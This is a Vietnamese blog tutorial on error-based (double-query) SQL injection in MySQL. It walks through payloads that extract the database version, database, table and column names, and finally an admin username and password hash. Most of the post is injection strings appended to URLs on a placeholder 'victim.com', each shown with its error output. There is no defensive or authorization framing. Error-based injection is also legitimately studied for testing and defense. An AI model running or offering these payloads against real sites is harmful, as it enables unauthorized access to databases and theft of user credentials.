Friday, 19 February 2016

Error based/Double Query SQL Injection

   No comments


Error Based/Double Query

Ở phần trước chúng ta tìm hiểu String based SQL Injection, phần này tôi sẽ nói về cách khai thác lỗi Error Based/Double Query

1/ Thế nào là Error Based ?
Đây là 1 phương thức xuất thông tin từ 1 database khi mà các hàm function như Union Select không working.
Error Based = Double Query (Error based 2x)

2/ Khi nào có thể sử dụng Error Based/Double Query
a.  The Used Select Statements Have  Different Number Of Columns.
b.  Unknown Column 1 or no columns at all (in webpage and page source)
c.  Error #1604

3/ Cách khai thác:
B1: Get verion
Code:
or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having
min(0) or 1--

Example:
Code:
http://victim.com/index.php?mode=getpagecontent&pageID=24
or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1—

 Result: Dulpicate entry ‘5.1.56-log:1’ for key group key
--> Biết được version database là 5.1

B2: Get database name
Code:
and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Example:
http://victim.com/index.php?mode=getpagecontent&pageID=24 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Result: Dulpicate entry ‘ iqbal_iqbal’ for key group key

--> Database: iqbal_iqbal
1 web có thể có nhiều database.Tăng limit cho đến khi tìm hết database name

B3: Get table name
Code:
and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)


Example:
http://victim.com/index.php?mode=getpagecontent&pageID=24 and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 19,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

 Result: Duplicate entry 'Seting~1' for key 'group_key
--> table: Seting
Khi tìm kiếm table chúng ta tăng giá trị Limit cho tới khi tìm thấy table
Limit N,1 ( trong đó N là số thực ). Các bảng table có thể là admin, tbladmin, user, administrator, setting …
Limit 2,1
Limit 3,1


B4: Get column from table
Code:
and (select 1 from (select
count(*),concat((select(select concat(cast(column_name as char),0x7e)) from
information_schema.columns where table_name=0xTABLEHEX limit
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Lưu ý: TableHex Limit
TableHex ở đây là mã hex , ở trên ta tìm đc table tên Seting . covert qua mã Hex 73657474696e6773
Tương tự ta cũng tăng giá trị Limit tới khi tìm dc các table qtrong như username,password

Example:
http://victim.com/index.php?mode=getpagecontent&pageID=24 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Result: Duplicate entry 'Id~1' for key 'group_key
Tiếp tục tăng limit

http://victim.com/index.php?mode=getpagecontent&pageID=24 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Result: Duplicate entry 'userName~1' for key 'group_key

   Column_name: userName
http://victim.com/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Result: Duplicate entry 'passWord~1' for key 'group_key

  Column_name: passWord


B5: Get data  from Column
Code:
and (select 1 from (select
count(*),concat((select(select concat(cast(concat(COLUMN_NAME,0x7e,COLUMN_NAME)
as char),0x7e)) from Databasename.TABLENAME limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a)
Lưu ý thay thế các trường sau:
       1.     COLUMN_NAME: where you insert the column name you want to extract information from
       2.     Databasename: where you insert the current database name of the website so that you'll be extract info from it
        3.     TABLENAME: where you insert the table name of the column names you extracted from
        4.     LIMIT N,1: LIMIT Function and N where N is a random integer

COLUMN_NAME replace with "userName" and "passWord"
Databasename replace with "iqbal_iqbal"
TABLENAME replace with "settings"

http://victim.com/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(concat(userName,0x7e,passWord) as char),0x7e)) from iqbal_iqbal.settings limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

 Result: Duplicate entry 'admin~86f574c1d63d53fa804c13c3213953d9~1' for group key


Username: admin
Password: 86f574c1d63d53fa804c13c3213953d9 

 Phần trước String based SQL Injection 
Phần tiếp theo mình sẽ nói về Blind SQL Injection  

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)
 

Copyright © 2016 Security and Hacking.

Designed by :-Way2themes